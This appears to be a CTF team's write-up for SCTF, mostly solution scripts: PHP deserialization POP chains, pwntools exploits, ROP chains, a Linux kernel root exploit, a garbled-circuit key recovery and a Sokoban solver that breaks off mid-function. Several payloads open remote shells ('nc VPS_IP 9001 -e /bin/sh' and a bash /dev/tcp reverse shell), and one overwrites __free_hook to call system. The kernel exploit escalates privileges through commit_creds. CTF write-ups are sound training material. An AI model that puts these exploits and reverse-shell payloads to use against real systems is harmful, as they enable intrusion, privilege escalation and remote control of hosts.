

  • PhpSession decode session存在逻辑问题,可以利用|=|xxx插入序列化数据,尾部脏数据不影响
  • pop chain 任意public无参方法调用直接走LazyOption#get rce

namespace PhpOption {
    class LazyOption {
        public $callback;
        public $arguments;
        public $option = null;
namespace Monolog\Handler {
    class FingersCrossedHandler {
        public $passthruLevel;
        public $handler;

namespace {
    $lazy = new PhpOption\LazyOption();
    $lazy->callback = "system"; $lazy->arguments = ["nc VPS_IP 9001 -e /bin/sh"];
    $h = new \Monolog\Handler\FingersCrossedHandler();
    $h->handler = [$lazy, "get"];



由于class.php中public object的声明方式导致生成pop chain时属性不能轻易清掉。所以干脆赋值后动态调,哪里有错就改下poc。最后readfile 即可

include "class.php";
$classes = array_slice(get_declared_classes(), 583);

$lines = file('./class.php');

function get_call_method($text) {
    preg_match('/if \(is_callable\(\[\$this->.*, \$(.*)\]\)\)/', $text, $res);
    return $res;

function get_invoke_from($text) {
    preg_match("/base64_decode\('(.*)'\)\;/", $text, $res);
    return base64_decode($res[1]);

function prune($text, $param) {
    if (preg_match('/sha1\(\$'.$param.'|md5\(\$'.$param.'|crypt\(\$'.$param.'/', $text)) {
        return true;
    if (preg_match('/\$'.$param.'\s+=\s+\$(.*)/', $text, $res)) {
        if (count($res) > 1 and $res[1] != $param) {
            return true;

function can_encoded($text, $param) {
    $call_lines = explode(";", $text);
    foreach ($call_lines as $call_line) {
        if (preg_match('/\$'.$param.'\s+=\s+(.*)\(\$(.*)/', $text, $res)) {
            return $res[1];

function get_valid_call($text, $param) {
    $calls = ["call"=>[], "invoke"=>[]];
    $call_lines = explode(";", $text);
    foreach ($call_lines as $call_line) {
        $call_line = trim($call_line);
        if (preg_match("/readfile/", $call_line)) {
            return "readfile is found";

        if (preg_match('/extract\(\[\$name\s+=>\s+\'(.*)\'\]\)/', $call_line, $res)) {
            // __call 的特殊情况
            return ["call"=>[$res[1]], "invoke"=>[]];
        if (prune($call_line, $param)) break;
        if (preg_match('/\$this->.*->(.*?)\(\$'.$param.'\)/', $call_line, $res)) {
            // 链式调用
            array_push($calls["call"], $res[1]);
        } else if (preg_match('/call_user_func\(\$this/', $call_line, $res)) {
            // call_user_func 单参数 => __invoke
            preg_match('/\[\'(.*)\'\s+=>\s+\$'.$param.'\]/', $call_line, $res);
            array_push($calls["invoke"], $res[1]);
    return $calls;

foreach ($classes as $class) {
    $class = new ReflectionClass($class);
    $methods = $class->getMethods();
    $classMap[$class->name] = [$methods[0]];
    $method = $methods[0];
    foreach ($method->getParameters() as $param) {
        $start = $method->getStartLine();
        $end = $method->getEndLine();
        if ($method->name === "__call") {
            $text = implode(array_slice($lines, $start, $end - $start));
            $realName = get_call_method($text)[1];
        } else if ($method->name == "__invoke") {
            $text = implode(array_slice($lines, $start, $end - $start));
            $invoke_p = get_invoke_from($text);
            $netFunc = get_valid_call($text, 'value\[\$key\]');
            $funcMap["invoke_".$invoke_p] = [$method->class, $netFunc];
        } else {
            $realName = $method->name;
        $funcMap[$realName] = [$method->class, $param->name, $start, $end];

function dfs(&$funcMap, &$func, &$lines, &$path, &$ans) {
    $param = $funcMap[$func][1];
    $start = $funcMap[$func][2];
    $end = $funcMap[$func][3];
    $funcText = implode(array_slice($lines, $start, $end - $start));
    $calls = get_valid_call($funcText, $param);
    if (is_string($calls) and $calls == "readfile is found") {
        array_push($ans, $path);
    } else {
        if (count($calls["call"]) == 0 and count($calls["invoke"]) == 0) return;
        if (count($calls["invoke"]) > 0) {
            foreach ($calls["invoke"] as $inv) {
                $invoke_func = $funcMap["invoke_".$inv];
                $nextcall = $invoke_func[1]["call"];

        if (is_array($nextcall) && count($nextcall) > 0) {
            array_merge($calls["call"], $nextcall);

        foreach ($calls["call"] as $call) {
            array_push($path, $call);
            dfs($funcMap, $call, $lines, $path, $ans);

$ans = [];
$func = "o1RgzGX";
$path = [];
dfs($funcMap, $func, $lines, $path, $ans);

$final = [];

// 从结果里继续剪,如果encode之后没有decode则丢掉
foreach ($ans as $path) {
    $change = [];
    foreach ($path as $func) {
        $param = $funcMap[$func][1];
        $start = $funcMap[$func][2];
        $end = $funcMap[$func][3];
        $funcText = implode(array_slice($lines, $start, $end - $start));
        array_push($change, can_encoded($funcText, $param));
    $index = array_search("base64_encode", $change);
    if ($index and in_array("base64_decode", array_slice($change, $index, count($change) - $index)) == false) {
    } else {
        array_push($final, $path);

$buffer= "";
$ch_array = str_split("abcdefghijklmnopqrstuvwxyz");
$curr = 0;
$final = $final[0];
array_unshift($final, "o1RgzGX");
foreach ($final as $func) {
    $className = $funcMap[$func][0];
    $buffer = $buffer. '$'.$ch_array[$curr++].' = new \\'.$className."();\n";


$curr = 0;
$newbuffer = "";
foreach ($final as $func) {
    $className = $funcMap[$func][0];
    $class = new ReflectionClass($className);
    $props = $class->getProperties();
    foreach ($props as $prop) {
        $propName = $prop->getName();
        $nextvar = $ch_array[$curr+1];
        $newbuffer= '$'.$ch_array[$curr]."->$propName=".'$'."$nextvar;\n".$newbuffer;

$buffer =$buffer.$newbuffer;
file_put_contents("poc.php", "<?php \ninclude \"class.php\";\n".$buffer."");





namespace Symfony\Component\String{
    class LazyString{
        public $value;
        public function __construct($value){
            $this->value = $value;

namespace {

    require "./vendor/autoload.php";
    $func = function(){system("cat /flag");};
    $d = new \Opis\Closure\SerializableClosure($func);
    $s = new \Symfony\Component\String\LazyString($d);
    echo serialize($s);


Upload_it 2


namespace Symfony\Component\String{
    class LazyString{
        public $value;
        public function __construct($value){
            $this->value = $value;

namespace {
    class sandbox {
        private $evil;
        public function __construct(){
            $this->evil = "/flag";

    $a = [new sandbox,"backdoor"];
    $s = new \Symfony\Component\String\LazyString($a);
    echo urlencode(serialize($s));



from pwn import*
import base64
import os
def store(index):
    return '\x00' + chr(index)
def loadNum(index):
    return '\x01' + chr(index) # push Num
def loadStr(index):
    return '\x02' + chr(index) # push Str PTR
def loadWord(index):
    return '\x03' + chr(index)
def call(funcIndex):
    return '\x04' + chr(funcIndex)
def add(indexA,indexB):
    return '\x07' + chr(indexA) + chr(indexB)
def exec_cmd(command):

libc = ELF('./libc-2.34.so',checksec=False)
Number = ''
Number += p32((0x21A560 + 0x38  - libc.sym['sleep'])&0xFFFFFFFF)
Number += p32((libc.sym['sleep']  - libc.sym['system'])&0xFFFFFFFF)
Number += p32(0x40)
Number += p32(0x220)
Number += p32((libc.sym['_IO_2_1_stdout_']  - libc.sym['sleep']) & 0xFFFFFFFF)
Number += p32(0)
code  = ''
code += loadWord(3)
code += loadNum(1)
code += '\x08'

code += loadWord(3)
code += loadNum(0)
code += '\x07'

code += loadStr(0)
code += loadNum(3)
code += '\x07'

code += loadNum(2)
code += call(4)

code += loadWord(3)
code += loadNum(4)
code += '\x07'

code += loadStr(0)

code += loadNum(2)
code += call(4)

code += loadStr(1)
code += loadNum(5)
code += loadNum(5)
code += call(0)

VM  = 'SCOM_LZ\x00'
VM += p32(len(code))            # Code Length
VM += code                      # Code Data
VM += p32(len(Number)/4)        # Num Length
VM += Number                    # Number
VM += p32(0x2)                  # String Count
VM += p32(0x5)                  # Word Count
VM += p32(len('1;/home/ctf/getflag >&2')) + '1;/home/ctf/getflag >&2'
VM += p32(len('/FMYY')) + '/FMYY'
VM += p32(6) + 'Dancer' #0
VM += p32(6) + 'Dasher' #1
VM += p32(7) + 'Rudolph'#2
VM += p32(5) + 'sleep'  #3
VM += p32(5) + 'Vixen'  #4

exec_cmd('rm /tmp/fmyy.scom')
exec_cmd('touch /tmp/fmyy.scom')
with open ("/tmp/fmyy.scom","wb") as f:


from pwn import*
import os
def exec_cmd(command):
def Create(name,value,sign = 0):
    payload  = 'gift'
    payload += ' '
    payload += name
    payload += ' '
    payload += 'is'
    payload += ' '
    if sign == 1:
        payload += '\"'
        payload += str(value)
        payload += '\";' + '\n'
        payload += str(value) + ';' + '\n'
    return payload
def call(funcName,arg1,arg2,arg3,retVar = None):
    payload  = 'reindeer'
    payload += ' '
    payload += funcName
    payload += ' '
    payload += 'delivering'
    payload += ' '
    payload += 'gift'
    payload += ' '
    payload += str(arg1) + ' ' + str(arg2) + ' ' + str(arg3)
    if retVar == None:
        payload += ';' + '\n'
        payload += ' '
        payload += 'brings back gift'
        payload += ' '
        payload += retVar
        payload += ';' + '\n'
    return payload

def pwn(p,Length,BF_FLAG):
    payload  = Create('filePath','/home/ctf/flag',1)
    payload += Create('flagMEM','N'*0x40,1)
    payload += Create('FakeFlag',BF_FLAG,1)
    payload += Create('inFD','4')
    payload += Create('retVal','0')
    payload += Create('Length','64')
    payload += Create('OpenFLAG','0')
    payload += Create('cmpRet','0')
    payload += Create('cmpLength',str(Length))
    payload += call('Dancer','filePath','OpenFLAG','OpenFLAG')
    payload += call('Dasher','inFD','flagMEM','Length')
    payload += call('Dancer','flagMEM','OpenFLAG','OpenFLAG')   
    p.sendlineafter('(EOF to finish):',payload)

p = remote('', 2144)


import requests
from pwn import*
url = ''
libc = ELF('./libc-2.31.so')
json = '''
data = {'wishes':json}
p = requests.post(url,data)

retData = p.text
Offset = retData.index('                    /lib/x86_64-linux-gnu/libc-2.31.so')
libc_base = int(retData[Offset - 41 -12:Offset - 41],16)
log.info('LIBC:\t' + hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
json = '''
  "bash -c 'bash -i >& /dev/tcp/ 0>&1'":"bash -c 'bash -i >& /dev/tcp/ 0>&1'",
  "bash -c 'bash -i >& /dev/tcp/ 0>&1'":"freeOldReadFlag"
}}'''.format(p64(free_hook - 0x60)[0:6],p64(system)[0:6])

data = {'wishes':json}
p = requests.post(url,data)
print p.text


from pwn import*
elf = ELF('./main')
pop_rax_ret = 0x0000000000401001
pop_rdi_jmp_rax = 0x0000000000402BE4
retf = 0x0000000000409BF6
syscall = 0x0000000000408865
pop_rsp_ret = 0x0000000000409D1C
int80_ret = 0x00000000004011f3
pop_rsi_ret = 0x0000000000401732
pop_rbx_ret = 0x0000000000403072
pop_rcx_ret = 0x000000000040117b
pop_rbp_ret = 0x0000000000401102
def pwn(p,index,ch):
    payload  = '\x00'*0x38
    payload += p64(pop_rax_ret) + p64(elf.sym['read_sys'])
    payload += p64(pop_rdi_jmp_rax) + p64(elf.bss() + 0x800)
    payload += p64(pop_rax_ret) + p64(elf.sym['read_sys'])
    payload += p64(pop_rdi_jmp_rax) + p64(elf.bss() + 0x8C0)
    payload += p64(pop_rsp_ret) + p64(elf.bss() + 0x800)


    payload2  = p64(retf) + p32(pop_rbx_ret) + p32(0x23)
    payload2 += p32(elf.bss() + 0x800 + 0xC0*2 - 6) + '\x00'*0xC
    payload2 += p32(pop_rcx_ret) + p32(0)
    payload2 += p32(pop_rax_ret) + p32(5)
    payload2 += p32(int80_ret)
    payload2 += p32(retf) + p32(pop_rax_ret) + p32(0x33)
    payload2 += p64(pop_rax_ret)
    payload2 += p64(pop_rsi_ret) + p64(elf.bss() + 0xC00) + '\x00'*0x10
    payload2 += p64(pop_rdi_jmp_rax) + p64(3)
    payload2 += p64(0)
    payload2 += p64(syscall)

    bytecmp = 0x0000000000408266
    loop = 0x408E1F

    payload2 += p64(pop_rax_ret)
    payload2 += p64(elf.bss() + 0xC00 + 0x46 + index)
    payload2 += p64(pop_rcx_ret) + p64(ch)
    payload2 += p64(pop_rbp_ret) + p64(loop)
    payload2 += p64(bytecmp)

    payload2  = payload2.ljust(0xC0*2 - 6,'\x00') + './flag'

index = 0
ans = []
while True:
    for ch in range(0x20, 0x7F):
        p = remote('', 2102)
#       p = process('./main')
        pwn(p, index, ch)
        start = time.time()
        end = time.time()
        if end-start < 0.5:
            print("".join([chr(i) for i in ans]))
        print("".join([chr(i) for i in ans]))
    index = index + 1

# SCTF{woww0w_y0u_1s_g4dget_m45ter}
print("".join([chr(i) for i in ans]))


from pwn import*

context.log_level = 'DEBUG'
p = process('./main')
p = remote('',2101)
p.send('FMS/*' + '\x01'*0x9)

p.send('FM/*' + '\x01'*0xA)

dataA = p.recv(0xB)
p.send('FMYYSSSS/*' + '\x01'*(0xC - 8))

p.send('FMYYSSSS/*' + '\x01'*(0xC - 8))

dataB = p.recv(0xB)

p.sendafter('data',dataB + dataA)


//gcc exp.c -o exp --static -masm=intel -lpthread
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <pty.h>
#include <linux/types.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <signal.h>
#define KERNCALL __attribute__((regparm(3)))
#define _GNU_SOURCE

int raceSign = 0,fd;
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pop user_rflags;"
    puts("[*]Status Has Been Saved.");

void get_shell()
    raceSign = 1;
    write(1,"[+] Got R00t (:\n",strlen("[+] Got R00t (:\n"));

void add_note() {

void del_note() {

void show_note() {

void *pthread_func(void *mem) {
    while(!raceSign) {

size_t REG12,kernel_base,commit_creds,prepare_kernel_cred;
size_t XCHG_EAX_ESP,pop_rdi_ret,push_rax_pop_rdi_ret,swapgs_ret,iretq;

int main()
    signal(SIGSEGV, get_shell);
    signal(SIGTRAP, get_shell);
    fd = open("/dev/seven", O_RDWR); if(fd < 0)     _exit(-1);

    char buffer[0x80];
    printf("Input the Value OF REG12:  ");
//  scanf("%llx",&REG12);
    REG12 = 0xffffffff82b15f40;
    kernel_base = REG12 - 0x1B15F40;
    commit_creds = kernel_base + 0x8C360;
    prepare_kernel_cred = kernel_base + 0x8C780;
    XCHG_EAX_ESP = kernel_base + 0x11CB0;
    pop_rdi_ret = kernel_base + 0x16E9;
    push_rax_pop_rdi_ret = kernel_base + 0x65AFAC;
    swapgs_ret = kernel_base + 0xC00F58;
    iretq = kernel_base + 0x24F92;
    uint32_t *ROP_Stack = (uint32_t*)(XCHG_EAX_ESP & 0xFFFFFFFF);
    if(mmap((void*)(XCHG_EAX_ESP & 0xFFFFF000), 0x2000, 7, 0x22, -1, 0) == MAP_FAILED) _exit(-1);

    size_t ROP[] = 
        swapgs_ret,     // swapgs; pop rbp; ret;
        iretq,      // iretq; ret;
        user_cs,                // saved CS
        user_rflags,            // saved EFLAGS
    memcpy((void*)ROP_Stack ,(void*)ROP,0x80);
    pthread_t thread;
    char *mem = (char *)calloc(1,0x1000);
    *(size_t*)(mem + 0x00) = XCHG_EAX_ESP;

    if ((pthread_create(&thread, NULL, pthread_func, (void*)mem)) == -1) {
        perror("Thread Error");
        return 1;
    while(!raceSign) {
        socket(22, AF_INET, 0); 
    if(pthread_join(thread,NULL)) {
        perror("Thread Finish");
    return 0;



ciruit map

using namespace std;

unsigned int SBoxes[6][16] = {{15, 1, 7, 0, 9, 6, 2, 14, 11, 8, 5, 3, 12, 13, 4, 10}, {3, 7, 8, 9, 11, 0, 15, 13, 4, 1, 10, 2, 14, 6, 12, 5}, {4, 12, 9, 8, 5, 13, 11, 7, 6, 3, 10, 14, 15, 1, 2, 0}, {2, 4, 10, 5, 7, 13, 1, 15, 0, 11, 3, 12, 14, 9, 8, 6}, {3, 8, 0, 2, 13, 14, 5, 11, 9, 1, 7, 12, 4, 6, 10, 15}, {14, 12, 7, 0, 11, 4, 13, 15, 10, 3, 8, 9, 2, 6, 1, 5}};
unsigned int SInvBoxes[6][16] = {{3, 1, 6, 11, 14, 10, 5, 2, 9, 4, 15, 8, 12, 13, 7, 0}, {5, 9, 11, 0, 8, 15, 13, 1, 2, 3, 10, 4, 14, 7, 12, 6}, {15, 13, 14, 9, 0, 4, 8, 7, 3, 2, 10, 6, 1, 5, 11, 12}, {8, 6, 0, 10, 1, 3, 15, 4, 14, 13, 2, 9, 11, 5, 12, 7}, {2, 9, 3, 0, 12, 6, 13, 10, 1, 8, 14, 7, 11, 4, 5, 15}, {3, 14, 12, 9, 5, 15, 13, 2, 10, 11, 8, 4, 1, 6, 0, 7}};
unsigned int PBox[] = {15, 22, 11, 20, 16, 8, 2, 3, 14, 19, 18, 1, 12, 4, 9, 13, 23, 21, 10, 17, 0, 5, 6, 7};
unsigned int PInvBox[] = {20, 11, 6, 7, 13, 21, 22, 23, 5, 14, 18, 2, 12, 15, 8, 0, 4, 19, 10, 9, 3, 17, 1, 16};

unordered_map<unsigned int, unsigned int>  middle_data;

unsigned int S(unsigned int block, unsigned int SBoxes[6][16]){
    unsigned int output = 0;
    for(int i = 0; i < 6; i++){
        output |= SBoxes[i][(block >> 4 * i) & 0b1111] << 4 * i;
    return output;

unsigned int permute(unsigned int block, unsigned int pbox[]){
    unsigned int output = 0;
    unsigned int bit = 0;
    for(int i = 0; i < 24; i++){
        bit = (block >> pbox[i]) & 1;
        output |= (bit << i);
    return output;

unsigned int encrypt_data(unsigned int block, unsigned int key){
    unsigned int res = block;
    for(int i = 0; i < 3; i++){
        res ^= key;
        res = S(res, SBoxes);
        res = permute(res,PBox);
    res ^= key;
    return res;

unsigned int decrypt_data(unsigned int block, unsigned int key){
    unsigned int res = block;
    res ^= key;
    for(int i = 0; i < 3; i++){
        res = permute(res, PInvBox);
        res = S(res, SInvBoxes);
        res ^= key;
    return res;

unsigned int encrypt(unsigned int block, unsigned int key1, unsigned int key2){
    unsigned int res = block;
    res = encrypt_data(res, key1);
    res = encrypt_data(res, key2);
    return res;

unsigned int decrypt(unsigned int block, unsigned int key1, unsigned int key2){
    unsigned int res = block;
    res = decrypt_data(res, key2);
    res = decrypt_data(res, key1);
    return res;

void init_middle_data(){
    cout << "Init middle data" << endl;
    unsigned int enc = 0;
    for(unsigned int i = 0; i < 0x1000000; i++){
        enc = encrypt_data(0,i);
        if(middle_data.find(enc) == middle_data.end()){
            middle_data.insert(pair<unsigned int, unsigned int>(enc,i));
            unsigned int count = 0;
            unsigned int tmp = 0;
                tmp = count << 24 | enc;
            }while(middle_data.find(tmp) != middle_data.end());
            middle_data.insert(pair<unsigned int, unsigned int>(tmp,i));

unordered_map<unsigned int, unsigned int> find_possible_key(unsigned int t){
    cout << "Find possible keys for " << t << endl;
    unordered_map<unsigned int, unsigned int> result;
    unsigned int dec = 0;
    for(unsigned int i = 0; i < 0x1000000; i++){
        unsigned int dec_count = 0;
        dec = decrypt_data(t,i);
        unsigned int dec_tmp = dec;
        while(middle_data.find(dec) != middle_data.end()){
            unsigned int key = i;
            if(result.find(key) == result.end()){
                result.insert(pair<unsigned int, unsigned int>(key,middle_data[dec]));
                unsigned int count = 0;
                unsigned int tmp;
                    tmp = count << 24 | key;
                }while(result.find(tmp) != result.end());
                result.insert(pair<unsigned int, unsigned int>(tmp,middle_data[dec]));
            dec = dec_count << 24 | dec_tmp;
    return result;

unsigned int recover_key_part2(vector< unordered_map<unsigned int, unsigned int> > possible_keys,vector<unsigned int>enc_labels,unsigned int a0,unsigned int b0,int idxi,int idxj){
    unordered_map<unsigned int, unsigned int> choice_keys;
    unsigned int c, c1, b1, a00;
    for(int i = 0; i < 4; i++){
        if(i == idxi || i == idxj) continue;
        choice_keys = possible_keys[i];
        c = enc_labels[i];
        c1 = enc_labels[idxi];
        for(auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter){
            b1 = iter->first;
            if(b1 > 0x1000000) continue;
            unsigned int dec_b1 = b1;
            unsigned int count = 0;
            while(choice_keys.find(b1) != choice_keys.end()){
                a00 = choice_keys[b1];
                if(a0 == a00 && decrypt(c,a0,dec_b1) == decrypt(c1,a0,b0)){
                    return dec_b1;
                b1 = count << 24 | dec_b1;
    return 0;

bool recover_key(vector< unordered_map<unsigned int, unsigned int> > possible_keys,vector<unsigned int>enc_labels){
    unordered_map<unsigned int, unsigned int>  choice_keys, choice_keys2;
    unsigned int c1, b0, a0, p1, c2, a1, b1;
    for(int i = 0; i < 4; i++){
        cout << "Recover key " << i << endl;
        choice_keys = possible_keys[i];
        c1 = enc_labels[i];
        for(int j = 0; j < 4; j++){
            if(i == j) continue;
            choice_keys2 = possible_keys[j];
            c2 = enc_labels[j];
            for(auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter){
                b0 = iter->first;
                if(b0 >= 0x1000000) continue;
                unsigned int count = 0;
                unsigned int dec_b0 = b0;
                while(choice_keys.find(b0) != choice_keys.end()){
                    a0 = choice_keys[b0];
                    p1 = decrypt(c1, a0, dec_b0);
                    unsigned int b0_tmp = dec_b0;
                    unsigned int count_tmp = 0;
                    while(choice_keys2.find(b0_tmp) != choice_keys2.end()){
                        a1 = choice_keys2[b0_tmp];
                        if(p1 == decrypt(c2,a1,dec_b0)){
                            b1 = recover_key_part2(possible_keys,enc_labels,a0,dec_b0,i,j);
                            if(b1 != 0){
                                cout << "Find keys : " << a1 << ", " << a0 << endl;
                                cout << "Find keys : " << b1 << ", " << b0 << endl;
                                return true;
                        b0_tmp = count_tmp << 24 | dec_b0;
                    b0 = count << 24 | dec_b0;
    return false;

unsigned int g_tables[2][4][2] = {{{13303835L, 2123830L},{2801785L, 11303723L},{13499998L, 248615L},{13892520L, 7462011L}},{{3244202L, 918053L},{3277177L, 6281266L},{1016382L, 7097624L},{10016472L, 13600867L}}};

int main(){
    for(int i = 0; i < 2; i++){
        vector< unordered_map<unsigned int, unsigned int> > possible_keys(4);
        vector<unsigned int>enc_labels(4);
        for(int j = 0; j < 4; j++){
            possible_keys[j] = find_possible_key(g_tables[i][j][1]);
            enc_labels[j] = g_tables[i][j][0];

import hashlib
from Crypto.Util.number import long_to_bytes
from block_cipher import decrypt

def xor(A, B):
    return bytes(a ^ b for a, b in zip(A, B))

def re_and(g_table, labels0, labels1):
    key = [0, 0]

    for g in g_table:
        if decrypt(g[1], labels0[0], labels1[0]) == 0:
            key[0] = decrypt(g[0], labels0[0], labels1[0])

        if decrypt(g[1], labels0[0], labels1[1]) == 0:
            key[1] = decrypt(g[0], labels0[0], labels1[1])

        if decrypt(g[1], labels0[1], labels1[0]) == 0:
            key[1] = decrypt(g[0], labels0[1], labels1[0])

        if decrypt(g[1], labels0[1], labels1[1]) == 0:
            key[1] = decrypt(g[0], labels0[1], labels1[1])

    return key

def re_xor(g_table, labels0, labels1):
    key = [0, 0]

    for g in g_table:
        if decrypt(g[1], labels0[0], labels1[0]) == 0:
            key[1] = decrypt(g[0], labels0[0], labels1[0])

        if decrypt(g[1], labels0[0], labels1[1]) == 0:
            key[0] = decrypt(g[0], labels0[0], labels1[1])

        if decrypt(g[1], labels0[1], labels1[0]) == 0:
            key[0] = decrypt(g[0], labels0[1], labels1[0])

        if decrypt(g[1], labels0[1], labels1[1]) == 0:
            key[1] = decrypt(g[0], labels0[1], labels1[1])

    return key

keys = [
    [13675268, 8343801],
    [12870274, 10251687],
    [12490757, 6827786],
    [3391233, 2096572],

G_Table = {5: [(13303835, 2123830),
               (2801785, 11303723),
               (13499998, 248615),
               (13892520, 7462011)],
           6: [(3244202, 918053),
               (3277177, 6281266),
               (1016382, 7097624),
               (10016472, 13600867)],
           7: [(5944875, 3442862),
               (7358369, 8423543),
               (6495696, 9927178),
               (13271900, 11855272)],
           9: [(5333988, 87113),
               (9375869, 11687470),
               (5011062, 14981756),
               (2509493, 12330305)]}

keys[4] = re_and(G_Table[5], keys[0], keys[1])
keys[5] = re_and(G_Table[6], keys[2], keys[3])
keys[6] = re_and(G_Table[7], keys[4], keys[5])
keys[7] = re_xor(G_Table[9], keys[6], keys[3])
the_chaos = b''
for i in keys:
    tmp = sum(i)
    the_chaos += bytes(long_to_bytes(tmp))
mask = hashlib.md5(the_chaos).digest()
c = long_to_bytes(0x1661fe85c7b01b3db1d432ad3c5ac83a)
print(xor(mask, c))



逆向出来就是一个推箱子游戏,地图随机生成,每次进行游戏时间有限,只能考虑脚本实现自动化推箱子了。不会A*算法,就糊了几个BFS加上一些限制条件,试了试再生成地图为某些特定条件下时可以找到通关游戏的路径,然后就是写了一个 shell 脚本不断的 调用 exp.py 将输出结果全部重定向到一个文件中,直接在文件中搜索有没有 flag 就行

下面这个文件为 exp.py 通过 pwntools 链接到远程,如果 成功进行了 5 次游戏就会 输出 200 个 & 所以直接在输出文件中搜索 & 标识即知道是否达到输出 flag 条件,context.log_level 为 debug 所有发送或接收都会打印出来,直接就可以看见 flag

from pwn import *
import copy
import os
import time

class addr:
    def __init__(self, x, y):
        self.x = x
        self.y = y

boxs = []
storage = []
used_storaged = [0] * 4

def isprime(n):
    i = 2
    while i * i < n:
        if n % i == 0:
            return False
        i += 1
    return True

def generate_map(content):
    arr = []
    cur = 0
    for i in range(0, len(content)):
        if content[i] != " ":
        # print(s[cur:i][1:])
        cur = i
        # print(cur, end = " :")
    map = ['#'] * 400
    for i in range(0, 20):
        for j in range(0 ,20):
            if arr[20 * i + j] == -1:
                map[20 * i + j] = '$'
            if arr[20 * i + j] == -3:
                map[20 * i + j] = '.'
            if arr[20 * i + j] == -2:
                map[20 * i + j] = '@'
            if isprime(arr[20 * i + j]):
                map[20 * i + j] = '#'
                map[20 * i + j] = '_'
    return map

def judge(x, y, map):
    if map[20 * y + x] == '#' or map[20 * y + x] == '$' or map[20 * y + x] == '*' or map[20 * y + x] == '.':
        return False
    return True

def judge_1(x, y, map):
    if map[20 * y + x] == '#' or map[20 * y + x] == '$' or map[20 * y + x] == '*':
        return False
    return True

def judge_2(x, y, map):
    if map[20 * y + x] == '#' or map[20 * y + x] == '$' or map[20 * y + x] == '*' or map[20 * y + x] == '.':
        return False
    return True

def judge_pre(x, y, map):
    if map[20 * y + x] == '#' or map[20 * y + x] == '$' or map[20 * y + x] == '*' or map[20 * y + x] == '.':
        return False
    return True

def judge_connect(des_x, des_y, map):
    if judge(des_x, des_y, map) == False:
        return False
    cur_x = 0
    cur_y = 0
    for yy in range(0, 20):
        for xx in range(0 ,20):
            if map[yy * 20 + xx] == '@':
                cur_x = xx
                cur_y = yy
    queue = [addr(cur_x, cur_y)]
    check_map = [0] * 400
    while len(queue) > 0:
        cur_x = queue[0].x
        cur_y = queue[0].y
        check_map[cur_y * 20 + cur_x] = 1
        x_offset = [0, 0, -1, 1]
        y_offset = [-1, 1, 0, 0]
        for i in range(0, 4):
            next_x = cur_x + x_offset[i]
            next_y = cur_y + y_offset[i]
            if next_x < 0 or next_x > 19 or next_y < 0 or next_y > 19:
            if judge(next_x, next_y, map) and check_map[next_y * 20 + next_x] == 0:
                if next_x == des_x and next_y == des_y:
                    return True
                queue.append(addr(next_x, next_y))
                check_map[next_y * 20 + next_x] = 1
    return False

def map_update(cur_x, cur_y, destination, map):
    if destination == 'w':
        map[cur_y * 20 + cur_x] = '_'
        for j in range(0, 4):
            if cur_x == storage[j].x and cur_y == storage[j].y:
                map[cur_y * 20 + cur_x] = '.'
        cur_y -= 1
        if map[cur_y * 20 + cur_x] == '$' or map[cur_y * 20 + cur_x] == '*':
            if map[(cur_y - 1) * 20 + cur_x] == '.':
                map[(cur_y - 1) * 20 + cur_x] = '*'
                map[(cur_y - 1) * 20 + cur_x] = '$'
        map[cur_y * 20 + cur_x] = '@'
    if destination == 's':
        map[cur_y * 20 + cur_x] = '_'
        for j in range(0, 4):
            if cur_x == storage[j].x and cur_y == storage[j].y:
                map[cur_y * 20 + cur_x] = '.'
        cur_y += 1
        if map[cur_y * 20 + cur_x] == '$' or map[cur_y * 20 + cur_x] == '*':
            if map[(cur_y + 1) * 20 + cur_x] == '.':
                map[(cur_y + 1) * 20 + cur_x] = '*'
                map[(cur_y + 1) * 20 + cur_x] = '$'
        map[cur_y * 20 + cur_x] = '@'
    if destination == 'a':
        map[cur_y * 20 + cur_x] = '_'
        for j in range(0, 4):
            if cur_x == storage[j].x and cur_y == storage[j].y:
                map[cur_y * 20 + cur_x] = '.'
        cur_x -= 1
        if map[cur_y * 20 + cur_x] == '$' or map[cur_y * 20 + cur_x] == '*':
            if map[cur_y * 20 + cur_x - 1] == '.':
                map[cur_y * 20 + cur_x - 1] = '*'
                map[cur_y * 20 + cur_x - 1] = '$'
        map[cur_y * 20 + cur_x] = '@'
    if destination == 'd':
        map[cur_y * 20 + cur_x] = '_'
        for j in range(0, 4):
            if cur_x == storage[j].x and cur_y == storage[j].y:
                map[cur_y * 20 + cur_x] = '.'
        cur_x += 1
        if map[cur_y * 20 + cur_x] == '$' or map[cur_y * 20 + cur_x] == '*':
            if map[cur_y * 20 + cur_x + 1] == '.':
                map[cur_y * 20 + cur_x + 1] = '*'
                map[cur_y * 20 + cur_x + 1] = '$'
        map[cur_y * 20 + cur_x] = '@'
    return cur_x,cur_y

def BFS_box2storage(box_x, box_y, storage_x, storage_y, map):
    cur_x = box_x
    cur_y = box_y
    queue = [addr(cur_x, cur_y)]
    check_map = [0] * 400
    from_map = [addr(0, 0) for i in range(400)]
    flag = False #标识到达终点
    choose = -1
    while len(queue) > 0:
        if flag:
        cur_x = queue[0].x
        cur_y = queue[0].y
        check_map[cur_y * 20 + cur_x] = 1
        x_offset = [0, 0, -1, 1]
        y_offset = [-1, 1, 0, 0]
        pre_offset = [1, -1, 1, -1]
        for i in range(0, 4):
            next_x = cur_x + x_offset[i]
            next_y = cur_y + y_offset[i]
            pre_x = cur_x
            pre_y = cur_y
            if x_offset[i] != 0:
                pre_x += pre_offset[i]
            if y_offset[i] != 0:
                pre_y += pre_offset[i]
            if next_x < 0 or next_x > 19 or next_y < 0 or next_y > 19 or pre_x < 0 or pre_x > 19 or pre_y < 0 or pre_y > 19:
            if judge_1(next_x, next_y, map) and judge_pre(pre_x, pre_y, map) and check_map[next_y * 20 + next_x] == 0:
                for j in range(0, 4):
                    if next_x == storage[j].x and next_y == storage[j].y:
                        from_map[20 * next_y + next_x].x = cur_x
                        from_map[20 * next_y + next_x].y= cur_y
